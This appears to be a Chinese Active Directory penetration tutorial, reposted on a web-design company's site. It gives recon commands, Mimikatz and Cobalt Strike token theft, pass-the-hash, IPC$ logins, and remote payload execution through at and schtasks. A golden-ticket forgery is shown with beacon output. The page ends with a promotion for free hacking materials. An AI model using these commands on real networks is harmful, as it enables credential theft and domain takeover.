尧图网络科技YAOTU DIGITAL 获取报价
获取报价
首页 / 资讯中心 / 文章详情

【内网渗透】内网渗透学习之域渗透常规方法

发布时间:2026/9/24 23:31:58

资讯中心
01
ARTICLE

【内网渗透】内网渗透学习之域渗透常规方法

【内网渗透】内网渗透学习之域渗透常规方法
域渗透常规方法和思路1、域内信息收集1.1、获取当前用户信息1.1.1、获取当前用户与域 SID1.1.2、查询指定用户的详细信息1.2、判断是否存在域1.2、查询域内所有计算机1.3、查询域内所有用户组列表1.4、查询所有域成员计算机列表1.5、获取域密码信息1.6、获取域信任信息1.7、查找域控制器1.7.1、判断用户是否在域1.7.2、查看域控制器的机器名1.7.3、查看域控制的主机名1.7.4、查看域控 IP1.7.5、查看域控制的主机名1.7.6、查看域控制器组1.8、查询当前域内存活主机2、判断本地管理员3、运行 Mimikatz读取密码4、登录认证4.1、Access Token 登录令牌4.2、散列认证4.3、IPC 连接4.4、黄金票据Golden Ticket1、域内信息收集1.1、获取当前用户信息1.1.1、获取当前用户与域 SIDwhoami /all1.1.2、查询指定用户的详细信息# 查询本地用户详细信息 net user user01 # 查询域用户详细信息 net user tester01 /domain1.2、判断是否存在域ipconfig /all systeminfonet view /domain若是此命令在显示域处显示 WORKGROUP则不存在域若是报错发生系统错误 5则存在域但该用户不是域用户net config workstationnet localgroup administrators查看本机管理员通常会包含有域用户1.2、查询域内所有计算机net view /domain:xxx1.3、查询域内所有用户组列表net group /domain1.4、查询所有域成员计算机列表net group domain computers /domain1.5、获取域密码信息可以获取域密码策略设置、长短、错误锁定等信息net accounts /domain1.6、获取域信任信息nltest /domain_trusts1.7、查找域控制器1.7.1、判断用户是否在域net time /domain域存在且用户在域内存在域当前用户不是域用户当前网络环境为工作组不存在域1.7.2、查看域控制器的机器名nltest /dclist:god1.7.3、查看域控制的主机名nslookup -typeSRV _ldap._tcp1.7.4、查看域控 IPping DC.test.labnslookup dc判断域控制器和DNS 服务器是否在同一服务器上nslookup test.lab1.7.5、查看域控制的主机名nslookup -typeSRV _ldap._tcp1.7.6、查看域控制器组net group domain controllers /domain实际网络中一个域内一般存在两台或两台以上的域控制器作为主备。netdom query pdcnetdom不是系统自带工具需要下载安装1.8、查询当前域内存活主机利用 windows 内置命令收集net group domain computers /domain利用NetBIOS 探测内网nbtscan 192.168.52.0/242、判断本地管理员net localgroup administrators3、运行 Mimikatz读取密码4、登录认证4.1、Access Token 登录令牌Access Token 保存了当前用户的权限信息每个进程可能使用不同用户的身份启动有不同的Access Token。如果我们想以域用户的身份做操作这个时候就可以获得本地域用户身份的进程然后进行token窃取。以下是令牌窃取的过程使用 ps 列出进程使用 steal_token [pid] 窃取令牌使用 getuid 找到你是谁使用 rev2self移除令牌方法1偷取token到进程中偷取token右键要横向的主机选择psexec64选择一个已经获得的凭据或者勾选使用当前令牌并选择监听器与会话即可当密码输入错误时执行上面的两个命令就会提示 登录失败: 未知的用户名或错误密码。 同样的使用 rev2self 可除去当前令牌恢复原来的SYSTEM 权限方法2制作token查看当前用户身份信息是否本地域用户如不是则需要获取本地域用户的进程steal_token 2116使用命令make_token domain\user password伪造一个token查看一下当前会话 uid访问dc的默认共享4.2、散列认证mimikatz 使用登录令牌开启了一个进程在单点登录信息那里填入我们提供的用户名称、域、密码哈希值cobalt strike自动的从那个进程中窃取令牌并关闭复制ntm哈希pth 命令获取信任pth GOD\Administrator f76d5be6348a96263e8bcb0f49552fbb最后使用命令移除当前窃取的令牌rev2self4.3、IPC 连接IPC ( Internet Process Connection)共享“命名管道”的资源是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限通常在远程管理计算机和查看计算机的共享资源时使用。通过 ipc$可以与目标机器建立连接。利用这个连接不仅可以访问目标机器中的文件进行上传、下载等操作还可以在目标机器上运行其他命令以获取目标机器的目录结构、用户列表等信息。利用条件开启了139、445端口管理员开启了默认共享连接失败原因用户名密码错误。目标没有打开ipc$默认共享。不能成功连接目标的139、445端口命令输入错误。建立一个ipc$前提需要获取到账号密码需要使用logonpasswords读取shell net use \\192.168.52.138\ipc$ xiaoc123 /user:administrator在使用net use 命令与远程目标机器建立ipc$后可以使用dir 命令列出远程主机中的文件。shell dir \\192.168.52.138\c$在使用net use 命令与远程目标机器建立ipc$后可以未使用tasklist命令的/S参数列出远程主机上运行的进程。使用net time命令确定远程机器当前的系统时间。shell tasklist /S 192.168.52.138添加计划任务at是Windows自带的用于创建计时任务的命令它主要工作在Windows Server 2008之前版本的操作系统中。使用at命令在远程目标机器上创建计划任务的流程大致如下 因为当前域控服务器使用的是server2008复制远程文件到目标服务器上域控服务器假设可以出网shell copy C:\Users\Administrator\Desktop\testartifact_x86.exe \\192.168.52.138\c$使用at命令添加定时执行payload文件shell at \\192.168.52.138 9:22:00 c:\testartifact_x86.exe执行成功删除使用at 命令创建计划任务的记录。shell at \\10.1.1.2 2 /delWindows Vista、Windows Server 2008 及之后版本的操作系统已经将at命令废弃了。于是攻击者开始使用schtasks命令代替at命令。schtasks命令比 at命令更为灵活、自由。shell schtasks /create /s 10.1.1.2 /tn test /sc onstart /tr c:\test_msf_local.exe /ru system /f这条命令的解释是在IP 为10.1.1.2主机上创建一个开启自启动的定时任务定时任务名称为test以system 的权限执test_msf_local.exe。若定时任务存在则发出警告。如果未与目标主机建立IPC连接需要输入用户名和密码的参数在末尾追加/u administrator /p “密码”。在使用schtasks命令时会在系统中留下日志文件C:\Windows\Tasks\SchedLgU.txt。如果执行schtasks命令后没有回显可以配合ipc$执行文件使用type命令远程查看执行结果。删除任务schtasks /delete /s 10.1.1.2 /tn test /f删除ipc$连接net use \\目标ip /del /y在使用schtasks命令时会在系统中留下日志文件C:\Windows\Tasks\SchedLgU.txt。如果执行schtasks命令后没有回显可以配合ipc$执行文件使用type命令远程查看执行结果。4.4、黄金票据Golden Ticket获取用户名、域名、域的SID值# 获取当前域 [07/10 10:43:39] beacon shell net view /domain [07/10 10:43:39] [*] Tasked beacon to run: net view /domain [07/10 10:43:40] [] host called home, sent: 47 bytes [07/10 10:43:53] [] received output: Domain ------------------------------------------------------------------------------- GOD 命令成功完成。 # 获取域内用户 [07/10 10:44:17] beacon shell net view /domain:god [07/10 10:44:17] [*] Tasked beacon to run: net view /domain:god [07/10 10:44:17] [] host called home, sent: 51 bytes [07/10 10:44:43] [] received output: 服务器名称 注解 ------------------------------------------------------------------------------- \\OWA \\ROOT-TVI862UBEH 命令成功完成。 [07/10 10:45:02] beacon shell whoami /user [07/10 10:45:02] [*] Tasked beacon to run: whoami /user [07/10 10:45:02] [] host called home, sent: 43 bytes [07/10 10:45:02] [] received output: 用户信息 ---------------- 用户名 SID god\administrator S-1-5-21-2952760202-1353902439-2381784089-500 #域的 SID 值即安全标识符 Security Identifiers使用 whoami /user 命令可查看注意不需要 SID 最后的一组数字 #SID 就是S-1-5-21-2952760202-1353902439-2381784089获取DC 中 KRBTGT 用户的 NTLM 哈希DC 中 KRBTGT 用户的 NTLM 哈希可以通过 dcsync 或 hashdump 获得也可以使用powershell加载mimikatz获取OWA\krbtgt 58e91a5ac358d86513ab224312314061右击会话生成黄金票据注意 Domain 需要填写成 FQDN 格式即完全合格域名 Fully Qualified Domain Name 也就是类似于teamssix.com 的格式[07/10 10:57:38] beacon mimikatz kerberos::golden /user:administrator /domain:god.cm /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /endin:480 /renewmax:10080 /ptt [07/10 10:57:38] [*] Tasked beacon to run mimikatzs kerberos::golden /user:administrator /domain:god.cm /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /endin:480 /renewmax:10080 /ptt command [07/10 10:57:38] [] host called home, sent: 313667 bytes [07/10 10:57:40] [] received output: User : administrator Domain : god.cm (GOD) SID : S-1-5-21-2952760202-1353902439-2381784089 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 58e91a5ac358d86513ab224312314061 - rc4_hmac_nt Lifetime : 2024/7/10 10:57:38 ; 2024/7/10 18:57:38 ; 2024/7/17 10:57:38 - Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for administrator god.cm successfully submitted for current session建立好黄金票据之后内可以使用命令判断当前权限票据存在生存时间过期失效shell dir \\DC\C$最后网络安全需要学习那些知识网络安全零基础入门学习路线规划初级1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗想要入坑黑客网络安全的朋友给大家准备了一份282G全网最全的网络安全资料包免费领取7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级黑客这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。网络安全工程师企业级学习路线视频配套资料国内外网安书籍、文档工具当然除了有配套的视频同时也为大家整理了各种文档和书籍资料工具并且已经帮大家分好类了。一些我自己买的、其他平台白嫖不到的视频教程要学习网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】
02
RELATED NEWS

相关资讯

更多网站建设与数字化升级内容

03
WHY YAOTU

想打造同款高转化官网?

懂行业、懂生意,从建站到增长一站式陪跑

场景化定制

不做模板站,围绕你的业务场景量身设计,小众不撞款。

营销型架构

以转化目标组织内容与路径,让官网真正带来询盘。

全周期服务

设计、开发、运营、运维一体,上线只是开始。

免费获取你的建站方案

留下需求,专属顾问 24 小时内为你输出方案建议。